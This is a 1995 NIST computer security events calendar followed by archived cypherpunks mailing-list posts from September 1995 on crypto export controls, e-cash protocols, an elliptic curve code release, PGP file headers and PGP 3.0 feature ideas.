                  COMPUTER SECURITY EVENTS CALENDAR

    This file contains a list of upcoming computer security 
events.
    The absence or inclusion of any particular event does not 
imply
    criticism or endorsement by the National Institute of 
Standards
    and Technology or the sysop.  Because of the nature of this
    material and how it is obtained, it is impossible to 
include
    every event.  If you know of computer security events that 
are
    not listed, please send the conference/course literature 
and
    requests to the following:

           Computer Security Resource Clearinghouse (Events 
Calendar)
           National Institute of Standards and Technology
           Room A-216, Bldg. 225
           Gaithersburg, MD 20899
           webmaster@csrc.ncsl.nist.gov


[Snip sessions before 9/7]


DATE:      09/07/95
TITLE:     Information Warfare Conference (InfoWarCon) '95
LOCATION:  Arlington, VA
SPONSOR:   National Computer Security Association (NCSA)
CONTACT:   National Computer Security Association
ADDRESS:   10 S. Courthouse Ave.
CITY_ST:   Carlisle, PA 17013
PHONE:     (717) 258-1816


DATE:      09/11/95
TITLE:     ASIS 41st Annual Seminar & Exhibits
LOCATION:  New Orleans, LA
SPONSOR:   American Society for Industrial Security (ASIS)
CONTACT:   Society for Industrial Security
ADDRESS:   1655 North Fort Myer Dr., Suite 1200
CITY_ST:   Arlington, VA 22209
PHONE:     (703) 522-5800


DATE:      09/11/95 - 09/13/95
TITLE:     Exploring the Hostile Cyberspace
LOCATION:  Cleveland, OH
SPONSOR:   NASA Lewis Research Center, et al.
CONTACT:   New Dimensions International
ADDRESS:   P. O. Box 897
CITY_ST:   Cardiff, CA 92007
PHONE:     (619) 436-5618


DATE:      09/12/95
TITLE:     COSAC '95
LOCATION:  Dublin, Ireland
SPONSOR:   Republic of Ireland AKA Associates
CONTACT:   AKA Associates
ADDRESS:   7 Darragh Road
CITY_ST:   Crossgar, Co. Down, BT30 9NP
E-MAIL:    cosac95@ibm.net


DATE:      09/14/95
TITLE:     Network Security (LAN's Client/Server and the 
Internet)
LOCATION:  St. Louis, MO (other dates and locations available, 
call CSI)
SPONSOR:   CSI (Computer Security Institute)
CONTACT:   CSI
ADDRESS:   600 Harrison Street
CITY_ST:   San Francisco, CA 94107
PHONE:     (415) 905-2626


DATE:      09/17/95
TITLE:     LISA 9th Systems Administration Conference
LOCATION:  Monterey California
SPONSOR:   USENIX, ACSTPA, SAGE
CONTACT:   USENIX Conference Office
ADDRESS:   22672 Lambert Street, Suite 613
CITY_ST:   Lake Forest, CA 92630
PHONE:     (714) 588-8649


DATE:      09/18/95
TITLE:     7th Commputer Security Incident Handling Workshop
LOCATION:  Karlsuhe, Germany
SPONSOR:
CONTACT:   Rechenzentrum Uni Karlsruhe, Herr Fischer
ADDRESS:   Zirkel 2
CITY_ST:   D-76131 Karlsruhe, Germany
PHONE:     +49 721 376422


DATE:      9/20/95
TITLE:     Acquisition Streamling and Information Warfare
LOCATION:  Koran Room, Ft. Myer Officers Club in Arlington, VA
SPONSOR:
CONTACT:
ADDRESS:
CITY_ST:   Arlington, VA
PRESENTER: Anthony Valletta, Deputy Assistant Secretary of 
Defense, C3I - Acqui
sitions
PHONE:     (202) 828-1920 for info or reservations


DATE:      10/10/95
TITLE:     18th National Information Systems Security 
Conference
LOCATION:  Baltimore, MD
SPONSOR:   NSA/NCSC and NIST/CSL
CONTACT:   Tammie Grice
ADDRESS:   NIST, Room A807, Bldg 101
CITY_ST:   Gaithersburg, MD 20899
PHONE:     (301) 975-3883


DATE:      10/19-20/95
LOCATION:  Bethesda, MD
SPONSOR:   ABA, NIST, USCIB, ...
CONTACT:   Worldwide Electronic Commerce Conference '95
ADDRESS:   PO Box 743485
CITY_ST:   Dallas, TX  75374
PHONE:     214.516.4900
EMAIL:     wec@multicorp.com
URL:       http://www.multicorp.com/wec


DATE:      10/24/95
TITLE:     The Business Recover Managers Symposium
LOCATION:  San Diego, CA
SPONSOR:   MIS Training Institute
CONTACT:
ADDRESS:   498 Concord Street
CITY_ST:   Framingham, MA 01701-2357
PHONE:     (508) 879-7999


DATE:      11/06/95
TITLE:     CSI's 22nd Annual Computer Security Conference
LOCATION:  Washington, D.C.
SPONSOR:   Computer Security Institute
CONTACT:   Computer Security Institute
ADDRESS:   600 Harrison St.
CITY_ST:   San Francisco, CA 94107
PHONE:     (415) 905-2626


DATE:      12/11/95
TITLE:     11th Annual Computer Security Applications 
Conference
LOCATION:  New Orleans, LA
SPONSOR:   Applied Computer Security Associates
CONTACT:   Ann Marmor-Squires
ADDRESS:   TRW Systems Division
CITY_ST:   Fairfax, VA 22033
PHONE:     (703) 803-5503


DATE:      05/15/97
TITLE:     Security and Audit Oracle
LOCATION:  Washington, D.C.
SPONSOR:   MIS & Dept. of Justice
CONTACT:   Pat Ciuffreda
ADDRESS:   CTTS/IRM/JMD, Room 1211-ARB
CITY_ST:   Washington, DC 20530
PHONE:     (202) 616-2018







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Mon, 11 Sep 95 06:18:28 PDT
To: karlmarx@ix.netcom.com
Subject: Re: Voice Encryption
In-Reply-To: <199509110742.AAA17689@ix5.ix.netcom.com>
Message-ID: <199509111315.QAA27696@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> A friend of mine recently told me that Phil Zimmerman was distributing
> a voice encryption program over the 'net. I dismissed his comment
> thinking he was probably

There are several packages references in the software section of
http://www.cs.hut.fi/crypto.  It also contains links to ftp sites
outside the United States.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Ackman <tka@brutus.bright.net>
Date: Mon, 11 Sep 95 14:13:08 PDT
To: cypherpunks@toad.com
Subject: itar question
Message-ID: <Pine.SUN.3.91.950911170252.25910A-100000@brutus.bright.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi. 

please excuse if this is an inappropriate place to ask this, but what the 
hell...

If I create a set of patches to a PD or GNU software package (i.e. telnetd, 
httpd) to support encryption (in particular SSL), can i put the patches up 
on an ftp site, Or would i be in violation of itar, and therefore risk 
getting hauled off by the feds?  (i'm a us citizen living/working in the 
states).

Thanks.
-TA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 11 Sep 95 18:07:21 PDT
To: pfarrell@netcom.com
Subject: Re: Media coverage of NIST Export meetings?
In-Reply-To: <32173.pfarrell@netcom.com>
Message-ID: <199509120107.SAA03422@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Has anyone seen any media coverage of last week's meetings?
| I haven't seen anything in either the Washington Post or
| the Wall Street Journal. Nothing on radio or local TV either.
| 
| I don't expect much coverage, as Joe Sixpack has no knowledge of
| why he should be interested. But I expected at least a paragraph
| hidden somewhere inside.  Perhaps I missed it.
| 
| Anyone else seen any???

I'm just in the process of sending off the abstract you did plus
the pointers to a number of journalist I know. But thats in Sweden,
so I guess it doesn't count. :-)

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@land.cs.Colorado.EDU>
Date: Mon, 11 Sep 95 18:49:24 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Brand e-cash implementation?
In-Reply-To: <Pine.PMDF.3.91.950910012952.541131339B-100000@umiami.ir.miami.edu>
Message-ID: <199509120148.TAA03019@land.cs.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Michael Froomkin <mfroomki@umiami.ir.miami.edu> wrote:
>
> Have there been any implementations, even as trials, of Brands' protocols?
> Do any ecash systems on the drawing board even include real user anonymity?


Could someone point me to Brand's electronic money protocol?  I have heard of
it and would like to learn more.  If it is a discussable topic then please
someone try to convince me that it is better than Chaum's or
Chaum's-plus-anonymity-both-ways, or some other candidate for E-Money
Protocol Which Has Official Cypherpunk Blessing.


(Hopefully a discussion will ensue and rescue this article from that room in
Data Hell where posts that ask for help but contribute nothing are sent...)


Bryce
signatures follow:


(new .sig with URL coming soon!  Stay tuned for more exciting adventures...)
                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Bryce's Auto-PGP v1.0beta3

iQCVAwUBMFTm5fWZSllhfG25AQHpOQP+MXO8vsxuFnQfaH5cE1t75jihM+m4RsRx
vaSHwYZJORdEqdZ4qhLj1WaLqRra+GiSbCiEy2i2kbA5ATyc+1huXCKoIsgF4Rp+
NUBlSG3X1N2iFq2DTvboCanajq0MMcLp1LOlzLPvjoEDuxnZhvSlk2LN6fg9ds3w
M4DflyKOmwo=
=DqDg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 11 Sep 95 21:54:01 PDT
To: cypherpunks@toad.com
Subject: Re: Brand e-cash implementation?
Message-ID: <199509120452.VAA14913@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Bryce Wilcox <wilcoxb@land.cs.Colorado.EDU>
> Could someone point me to Brand's electronic money protocol?  I have heard of
> it and would like to learn more.  If it is a discussable topic then please
> someone try to convince me that it is better than Chaum's or
> Chaum's-plus-anonymity-both-ways, or some other candidate for E-Money
> Protocol Which Has Official Cypherpunk Blessing.

<URL:http://ganges.cs.tcd.ie/mepeirce/Project/Mlists/brands.html> has a
good collection of earlier discussions on Brands' cash, as well as
pointers to Brands' work itself.

Brands' home page, <URL:http://www.cwi.nl/~brands> has a long list of
advantages which his system has over Chaum's original cash proposals,
mostly technical in terms of efficiency and provability.

Brands' and Chaum's systems have similar anonymity properties so I don't
see much to choose between them on political grounds.  Brands tends to
work in the context of off-line systems with "observer" chips which
prevent double spending.  But his protocols can be used in other payment
environments as well.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 11 Sep 95 18:53:22 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: crypto confrontation
In-Reply-To: <199509112036.NAA10670@netcom13.netcom.com>
Message-ID: <Pine.SUN.3.91.950911214954.6546B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Sep 1995, Vladimir Z. Nuri wrote:

> picketers in front of buildings clashing with police is almost 
> guaranteed to get a little media coverage, almost no matter what
> the issue.

I was really considering dropping by the meeting myself, and laying down 
the line in a very resistant manner, but as usual too much research popped 
up at the wrong time!  Imagine having a copy of PGP in a DHL package 
addressed to a cyperhpunk in Europe, holding it up and going "I'm mailing 
this tommorow.  Try putting me in jail!"

-Thomas







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rosing <cryptech@Mars.mcs.com>
Date: Mon, 11 Sep 95 21:14:45 PDT
To: cypherpunks@toad.com
Subject: Elliptic Curve Public Key Crypto available
Message-ID: <Pine.3.89.9509112204.A25037-0100000@Mars.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii files.  
One contains code and the other contains documentation: eliptic.src and 
elliptic.doc.  The code portion is a cat'ed block of files: headers,
C sources and a set of prime numbers.  The documentation attempts to
explain the math, but it does help if you already know number theory.  It 
hopefully isn't necessary.

The code is a specific implementation of one particular type of math.  
It violates no known patents.  It appears to work.  The academics claim 
that elliptic curves over Galois Fields are really secure.  Preliminary 
testing bears this out, changing one bit of input gives uniformly 
distributed "random" output.

Previous to the availabilty of 100 MHz processors this method of public 
key crypto was ridculously slow.  The only versions were laboratory 
curiosities implemented in ASIC hardware.  Code, if it exists, is not in 
the public domain.

The code is based on several papers (some 15 references are listed in the 
doc file, 6 are more directly important) and a couple of books.  It 
includes optimal normal basis math, elliptic curve math, and public key 
secret sharing.  With 128 bit symmetric encryption, a 226 bit field is 
more than sufficient to hide it.

I believe it is really strong crypto.  I did not invent anything.  I just 
implemented a few textbook examples that nobody else has.  Since it's 
from public domain sources, and it's now public domain software, it can 
be freely used.  You get what you pay for.  

Code is a living thing.  It takes lots of people lots of time to make any 
code useful.  The purpose of this code is to show that there is more than 
one way to create public key cryptosystems and to bring academic 
discussion into the everyday realm of real world problems.  I suggest you 
get a copy to work with before it becomes illegal ;-)

Patience, persistence, truth,
Dr. mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 11 Sep 95 23:08:55 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Digital Fingerprinting
In-Reply-To: <Pine.SUN.3.91.950911054528.26534B-100000@panix.com>
Message-ID: <Pine.D-G.3.91.950911225223.104A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Sep 1995, Duncan Frissell wrote:

> 
> On Sun, 10 Sep 1995, Timothy C. May wrote:
> 
> > If a piece of mail addressed to me is found littering the highway, can I be
> > convicted of littering? No, because the _provenance_ of that item of mail
> > cannot be determined...it might have accidentally blown out of a trash
> > truch delivering my mail to the dump, for example.
> 
> I'm afraid that they are busting people in New York for recycling 
> violations when they find mail addressed to them mixed in with household 
> garbage in public trash cans.

Finding the mail mixed in there is evidence that supports the "charge" 
but surely can be rebutted.  When I was practicing in a small town c. 
1984, people would be summoned (sent a paper telling them to show up) to 
court for illegal dumping if their mail was found with other trash, old 
refrigerators, etc., in a creek somewhere.  Those charged could always 
put on proof that Billy Bob's garbage service picked up their trash ...

The sentence was almost always to go and pick up some multiple of the 
garbage found and take it to the landfill.

No on was ever "busted" in the way I think of it -- arrested.

I guess NY doesn't have as much serious crime as I thought!

EBD



 
> DCF
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Mon, 11 Sep 95 22:32:37 PDT
To: cypherpunks@toad.com
Subject: away from my mail
Message-ID: <199509120534.XAA01019@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


I will not be reading my mail for a while.
Your mail concerning "Re: CFV: rec.knives"
will be read when I'm back.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Mon, 11 Sep 95 22:48:11 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: spam apology
Message-ID: <Pine.LNX.3.91.950911234902.268B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


cpunks,

sorry for my recent spam of the list due my inept testing of how procmail 
interacts with the vacation program.

-pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 11 Sep 95 23:22:44 PDT
To: cypherpunks@toad.com
Subject: Re: spam apology
Message-ID: <199509120622.XAA05153@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>cpunks,
>
>sorry for my recent spam 

Look, the SPAM was hot, and there wasn't too
much VELVEETA added other than the mail.cyperpunks
category, so it tasted fairly good. It hadn't passed
the expiration date, so all is forgiven.

Love Always,

Carol Anne
ps Has anyone ever heard of alt.skullfuck.charles-eicher?
   Even Gloria Segal doesn't reap that much hatred.
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 12 Sep 95 01:36:36 PDT
To: cypherpunks@toad.com
Subject: Re: anyone got a cpunk URL for the UK munitions T?
Message-ID: <ac7af7da0e0210047b0d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


My homepage has not got that many links, but it is fairly well known.
I would be happy to set up a WWW page just for you. How about:
http://obscura.com/~t-shirt/

This will be around for quite a while, since I am getting into the ISP biz, and
obscura is my domain.

At 1:05 AM 9/12/95, aba@atlas.ex.ac.uk wrote:
>On the subject of the UK printing of the muntions T-shirt, I've got a
>problem, I would like to put a URL for how to obtain the T-shirts, and
>cypherpunk political material, anti ITAR, clipper etc, bu yet I can't
>very well put my URL:
>
>        http://www.dcs.ex.ac.uk/~aba/rsa/
>
>because that may possibly move within a year, maybe sooner, and
>T-shirts are so permanent :-(
>
>It seems like too good an opportunity to miss, as some people may get
>the thing nice publicity, and interest in the cypherpunks take on
>encryption, so it would be ideal to have an on-line reference on the
>shirt.
>
>So what I was thinking is it would be nice if someone with a permanent
>URL, could put a pointer to my URL, that could be updated later, as my
>URL moves?
>
>A cypherpunks page which has been and will be around for a *long time*
>with lots of info or pointers to info on ITAR, the evils of key escrow
>etc would be ideal.
>
>I don't need the WWW space for the actual info as such, just a pointer
>which can point to where-ever it is my URL moves to, and as most
>cpunks URLs seem to be in the US, it wouldn't be a v good idea to put
>my content on a US server anyway (arguably).
>
>Any offers?
>
>Also now I'm here, there were a few people on the list who ordered
>shirts from me, and the progress has been slow, if you want to see the
>reasons, and up-to-date state of progress, take a look at:
>
>        http://www.dcs.ex.ac.uk/~aba/uk-shirt.html
>
>I need to decide soon as to what URL to print, I was otherwise
>thinking of removing the URL, as my sys admin made some strange
>cryptic comment about me not having my URL after a while anyway (when
>I finish the course, pointed comment? who knows), and I thought it
>might not go down to well if I printed my URL on the T-shirt, at least
>if it's an indirect pointer I have the option to get alternate WWW
>space.
>
>I have decided to switch printers as the last guy seems to have
>vanished, no answers to messages on answer phone for > 1 week, and
>some shirt printers (like the new one I've chosen) offer to the whole
>job in a week, and people are getting impatient for their shirts.  So
>I ideally need a commitment of a URL so that I can modify the design &
>send of to this new printers tonight.
>
>The main criteria, apart from a nice selection of links (I've got ITAR
>and cpunk links allready anyway) is that the URL pointing at my roving
>URL is going to stay there for a few years, at least.
>
>Adam

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Tue, 12 Sep 95 00:19:32 PDT
To: cypherpunks@toad.com
Subject: PGP in UK - snooped as unSTEALTHed?
Message-ID: <199509121021.FAA22455@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


>Received: by toad.com id AA16930; Sun, 10 Sep 95 02:10:05 PDT
>From: anonymous-remailer@shell.portal.com
>Subject: PGP in UK

>-----BEGIN PGP SIGNED MESSAGE-----

>I heard something rather disturbing the other day from someone I do
>business with.  I've been telling this company for 18 months or so
>about the advantages of PGP and email rather than faxes, and they
>finally tried it, liked it, and decided to use it a month or so ago.
>Last week they got a visit from the Department of Trade of Industry
>and MI5 (or is it MI6?) telling them to stop using PGP or they might
>find difficulties getting export licences for their products in
>future.  The visitors wouldn't say how they knew this company had
>been using it.

                    PGP IS MARKED!

   Well, I just used MIT's PGP 2.6.2 with 3 different users' public
keys to encrypt 3 different files. In all 3 files, the first 3
characters were the same (an umlauted A, then an i with an up arrow
over it, and then a heart). This beginning 3 character string is
apparently the infamous PGP RSA signature. The signature that says
to spooks' programmed encryption sniffers - "HEY! I'M PGP -  GIVE ME
A LOOK!."

   When are the PGP designers and coders going to get serious and de-
velope STEALTH PGP inside PGP itself!? I think that it would take the
states at least many thousands of times the computing cycles to spot
PGP encrypted files without the RSA signature. - IF it were practical to
look for STEALTH PGP at all when snooping communications networks.

  So what, -that "only a few companies" will be discovered to be using PGP
through the RSA signature!? Those few companies are the seeds for the
vast numbers of companies that would follow them in using PGP over the
Internet. The RSA signature is the flag that allows the spooks to easily
net the bold first companies. The RSA signature is greatly impeding the
spread of PGP use over the Internet. PGP MUST BE STEALTHED!!

             ENCRYPTION METHODS' "RANDOM" SIGNATURE

   PGP files are, of course, compressed to remove redundancy and thus make
the method stronger. This, along with the algorithm, produces a "random"
bit file. I believe that most files on the Internet are not compressed
and thus would show order on statistical sniffing programs. Of the files
that are compressed, by PKZIP for example, I believe they would probably
have a compression string signature particular to that compression met-
hod. Otherwise, compressed files show more randomness. I don't know if
compressed programs show an order throughout the file. If they do, then,
possibly, PGP could have a function added to it to duplicate this order.

   This suggests that PGP should also have a function that makes a phoney
compression method signature. This would allow PGP'ed files to hide
amoung compressed files on the Net.

                   -----------

   With the removal of the PGP RSA signature and the addition of phony
compression signatures, PGP'ed files would travel the Net without draw-
ing attention to themselves. This would greatly facilitate the growth
of PGP traffic by organizations.


         MICROSOFT VERSUS BORLAND FOR COMPILING/ASSEMBLING PGP

   Oftentimes, Borland C and Assembler can be bought at prices that
are a fraction of the price of Microsoft C and Assembler. This suggests
that PGP should be programmed with Borland instead of with Microsoft. I
think that this would be a step in making PGP a real peoples' encryption
method. It is more practical for people to get Borland programming soft-
ware than Microsoft programming software. This change from Microsoft to
Borland might encourage a lot of experimentation and innovation by a lot
of individual and small group programmers.


>The person who told me about this also said something about a
>Department of Trade & Industry paper which mentioned that the British
>Government was going to insist on key escrow for encryption.  I had
>hoped to get a copy of this, but he can't find it at the moment.
>I'll post the text when I get it if anyone's interested.

>Anyone else in the UK heard anything about this?

>- -- B.

>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.i

>iQEVAgUBMFGPfeHVHXeXphJJAQFJ0Af/Svh0ifULgpEuauSBPFreDDJoa/a1gcPe
>ya3CjOde9kVuN0IkBHFubO18MrAO6WbwlhVa/X/pjG4vbSahonpzmgHHfkVW20Gh
>qlhBwFLElTmOgspSjHJ74sYNUM2YZ+AKOyNwW4ix6woJ0WL0NP+cV8CZv4tdEH4l
>EI3/FuoFccbkKMk7QYoRPOyj5FI4GiFxVsg1GFOU3r83bxfJDfU2yZdImEBx/Nlc
>gteizqFTF/QiKckl6f5NzCBzaoIcMw0VLN8dAGLqzDycJtFqGdOPgvgSt1LwXKBs
>+zJM5Z/laubYm5SiEPy4oVz9N3lT4EOzEtdMEoiSC6IiSDSaURkEAA==
>=GiY0
>-----END PGP SIGNATURE-----


>-----BEGIN PGP PUBLIC KEY BLOCK-----
>Version: 2.6.i

>mQENAi8KzVoAAAEH/2gPfD2Xdw1nDAXtMH/F5iCMrwdXHXolEfOjRP59QP1Yodhb
>L+NGSNls67+H1us5PP5EpHDbHRy66ExgRK7XdZ/2qz0SsbTG+R6pRIILmMfgd3Nj
>M6uq1DehdxWPdp4PMC9LNrG2V9QrRGPgpHhr3iDfy+p6JTjW8XCYUXn5POt0wBs2
>n/vlowjLf9dVYwUKP58V9gokNsFlGcB08gEbxKa9Y2X7zB3BAlywPVdKVh+BOTCK
>z1Sofx9Wup0MEXEDEESLDSq/634hzzVx6Kt54cZBbi5nAdPHWlGHZl5vU93A3jPE
>fh59JXsCZmWKLXMjZtjcIJYkC4hC4dUdd5emEkkABRG0DEIuIERlIExhIFBheokB
>FQIFEC8g7yzh1R13l6YSSQEBD+4H/ir8R4iw1tWLUuxz6etmV99OhMUYoI5lQnxz
>9KARQf4eD3xHPoMw6tHLKOUR8xYS9i2RmkhJrPRzCfD5OKSOBEHuIQEt/+dcbCuw
>0fxn9NrU7NjFWwWKQ+0jYikN3hfIWcPmGtyhQ0KSrGfUDo5+rJr5Cy4U6eOooepv
>gYniecNNVAzQ2KDiWTOZ5zqG3zBAYj6uw8LHvBR1qol2YcJ4s02c4GdAZmzEq49s
>nDBortKfWUAxZkESBt2tMx8gYq6b38evYJBLXOqEN5Lt/5zf0nG1u0BEWBLaCj55
>y8lh1KolVOu808tX9blOrjqwEB12vngjXzf7hHWohrGrrQVT2N4=
>=5qEt
>-----END PGP PUBLIC KEY BLOCK-----



THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 12 Sep 95 03:46:13 PDT
To: cypherpunks@toad.com
Subject: Questions on PGP3.0
Message-ID: <199509121046.EAA00209@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ok, any of you who are involved in PGP 3.0, please fess up. I know that
                                            ^^^^^^^^^^^^^^
it's not even into the RealSoonNow(tm) stages, so I have some questions
about features, like are they being addressed/considered/rejected:

1) Extracting & using the IDEA keys
2) Old ID strings retained for signatures, but maybe less obvious
3) Ignoring new ID strings not signed with the key
4) Some kind of This Key will self-destruct in 1 year type of thing
   so we don't someday have 5 meg keyfiles of revoked keys. Also
   attempts at dating the signatures on the assumption of honesty
5) Automagically linked keys for secure/nonsecure work
6) Built in rant-detector/filter
7) Add-an-ad, for example "This PGP msg brought to you by Coke!"
   to help the PGP project gain commercial support.
8) maybe a non-propagation signature, or something to keep joe sixpack
   from signing a key he just wants to trust (but not declare that trust), 
   because the sig somehow seems to end up up on a keyserver.
9) Grab-for-the-throat replacement of some of the add-in tools. For
   example, giving PGP some option so that it comes up with a menu, with
   one of the options being to invoke the editor that some other program
   thought it was invoking when it ran PGP.
10) Being able to bypass things like This key not fully certified do you
   want to certify it yourself (y/N).

Just some thoughts, not a wish list or anything. Umm, well that #6 maybe...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFVkycLa+QKZS485AQFLqgL/dvaEnZavsAOiT8eNKJhRLh+Izlxx2QmF
sXj+Ps7O+xughkGz+OankAsqhON/iHeWczEVHGa5grIJ1WDlX77lqdANtHjpf2tI
QXMD7iLB3gdX4Gy8X2OaQifp2QS8IN4l
=gXJQ
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Sep 95 03:25:04 PDT
To: A5113643667@attpls.net (Tom Jones)
Subject: Re: draft key mgmt props
In-Reply-To: <3E79EDD0>
Message-ID: <199509121024.GAA15929@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Jones writes:
> Does anyone here feel like explaining the situation between the three
> key management proposals now at the internet draft stage?

Which ones are you refering to?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Sep 95 03:29:50 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: PGP in UK - snooped as unSTEALTHed?
In-Reply-To: <199509121021.FAA22455@mail.socketis.net>
Message-ID: <199509121029.GAA15937@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Gary Jeffers writes:
>    Well, I just used MIT's PGP 2.6.2 with 3 different users' public
> keys to encrypt 3 different files. In all 3 files, the first 3
> characters were the same (an umlauted A, then an i with an up arrow
> over it, and then a heart). This beginning 3 character string is
> apparently the infamous PGP RSA signature. The signature that says
> to spooks' programmed encryption sniffers - "HEY! I'M PGP -  GIVE ME
> A LOOK!."

As if they couldn't figure it out anyway. It isn't an "RSA signature"
by the way. Read format.doc sometime.

>    When are the PGP designers and coders going to get serious and de-
> velope STEALTH PGP inside PGP itself!?

Never, I hope. It would dramatically lower the utility of the
system. Can you imagine how disgusting it would be to try decrypting
something if you have a dozen keys outstanding? Not to mention how
hard it would be to deal with figuring out that you should even try to
decrypt things in the first place.

>   So what, -that "only a few companies" will be discovered to be using PGP
> through the RSA signature!? Those few companies are the seeds for the
> vast numbers of companies that would follow them in using PGP over the
> Internet. The RSA signature is the flag that allows the spooks to easily
> net the bold first companies. The RSA signature is greatly impeding the
> spread of PGP use over the Internet. PGP MUST BE STEALTHED!!

It isn't an RSA signature. Its a bunch of magic numbers.

Look, get real already. If someone sees a bunch of random numbers in
mail sent by me, its going to be pretty obvious what the hell is
inside anyway.

I very much see this whole thing as a non-issue.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Tue, 12 Sep 95 06:48:09 PDT
To: cypherpunks@toad.com
Subject: VCR+ encode/decode source file error.
Message-ID: <199509121345.GAA21447@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

If anyone is interested, the "vcr+.shar.gz" file
from "sable.ox.ac.uk" contains
